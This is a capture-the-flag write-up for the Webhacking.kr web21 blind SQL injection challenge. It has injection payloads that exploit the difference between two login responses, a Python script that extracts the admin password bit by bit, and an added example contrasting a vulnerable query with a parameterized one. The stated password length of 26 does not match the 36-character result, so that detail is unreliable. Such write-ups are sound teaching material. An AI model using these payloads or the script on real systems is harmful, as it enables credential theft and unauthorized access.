Webhacking.kr - web21
web21
A blind SQL injection challenge.
Judging by the page, though, it looks like a challenge where you have to recover the password.
The server-side code seems to be something like this:
If the entered id exists in the table, the pw for that id is fetched and compared with the entered value; if they match, you are logged in.

```
select pw from table where id=''
if pw != $_GET['pw'] -> wrong password
```
Solution
Filtering: union select

id=' or 1 %23&pw=1 -> wrong password
id=' or 0 %23&pw=1 -> login fail

Using this difference in responses, we extract the password with an if statement.

id=' or id='admin' and if(ascii(substr(pw,1,1))>48,1,0)%23&pw=1 -> wrong password
id=' or id='admin' and if(ascii(substr(pw,1,1))<48,1,0)%23&pw=1 -> login fail

First, the length of the pw for id='admin' is 26.
Result: pw : there_is_no_rest_for_the_white_angel
So entering id=admin, pw=there_is_no_rest_for_the_white_angel succeeds.
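As an added example, not part of the original writeup, here is a small Python model of the login logic guessed above, with a constructed in-memory SQLite table standing in for the challenge's real table (the `users` table, the `guest` row and the `example_pw` value are assumptions). SQLite uses `-- ` for line comments where the MySQL payloads above use `#` (%23). The string-concatenated version reproduces the two distinguishable responses ("wrong password" vs. "login fail") that the solution relies on; the parameterized version treats the same input as plain data, so both payloads return "login fail" and the oracle disappears.

```python
import sqlite3

# Constructed stand-in for the challenge's user table (assumption: id/pw columns, admin row).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("guest", "guest"), ("admin", "example_pw")])
    return conn

def login_vulnerable(conn, user_id, user_pw):
    """Query built by string concatenation: the id value becomes part of the SQL text."""
    sql = "SELECT pw FROM users WHERE id='" + user_id + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "login fail"          # no row matched
    if row[0] != user_pw:
        return "wrong password"      # a row matched but pw differs: a second, distinct message
    return "login success"

def login_safe(conn, user_id, user_pw):
    """Same logic with a bound parameter: the id value is only ever data, never SQL."""
    row = conn.execute("SELECT pw FROM users WHERE id=?", (user_id,)).fetchone()
    if row is None:
        return "login fail"
    if row[0] != user_pw:
        return "wrong password"
    return "login success"

if __name__ == "__main__":
    conn = make_db()
    # The two probe inputs from the writeup, with a SQLite comment in place of MySQL's '#'.
    for uid in ("' or 1 -- ", "' or 0 -- "):
        print(repr(uid), "vulnerable:", login_vulnerable(conn, uid, "1"),
              "| safe:", login_safe(conn, uid, "1"))
```

Binding the parameter removes the injection itself; returning one identical message for "unknown id" and "wrong password" additionally removes the response difference that makes a blind boolean oracle possible even where some other injection point exists.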
```python
import requests

url = 'https://webhacking.kr/challenge/bonus-1/'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'PHPSESSID': '[redacted]'}
bit_len = ''
bit_val = ''
pw = ''

for i in range(1, 37):
    # First decide whether the i-th character's ASCII code is 7 bits or 6 bits long.
    payload = {'id': "' or id='admin' and if(length(bin(ascii(substr(pw," + str(i) + ",1))))=7,1,0)#", 'pw': '1'}
    res = requests.get(url, headers=headers, cookies=cookies, params=payload)
    if 'wrong password</b>' in res.text:
        bit_len = 7
    else:
        bit_len = 6
    # Then read the character bit by bit; "wrong password" means the condition was true (bit is 0).
    for j in range(1, bit_len + 1):
        payload = {'id': "' or id='admin' and if(substr(bin(ascii(substr(pw," + str(i) + ",1)))," + str(j) + ",1)=0,1,0)#", 'pw': '1'}
        res = requests.get(url, headers=headers, cookies=cookies, params=payload)
        if 'wrong password</b>' in res.text:
            bit_val += '0'
        else:
            bit_val += '1'
    pw += chr(int(bit_val, 2))
    bit_val = ''

print('pw :', pw)
```
This post is licensed under CC BY 4.0 by the author.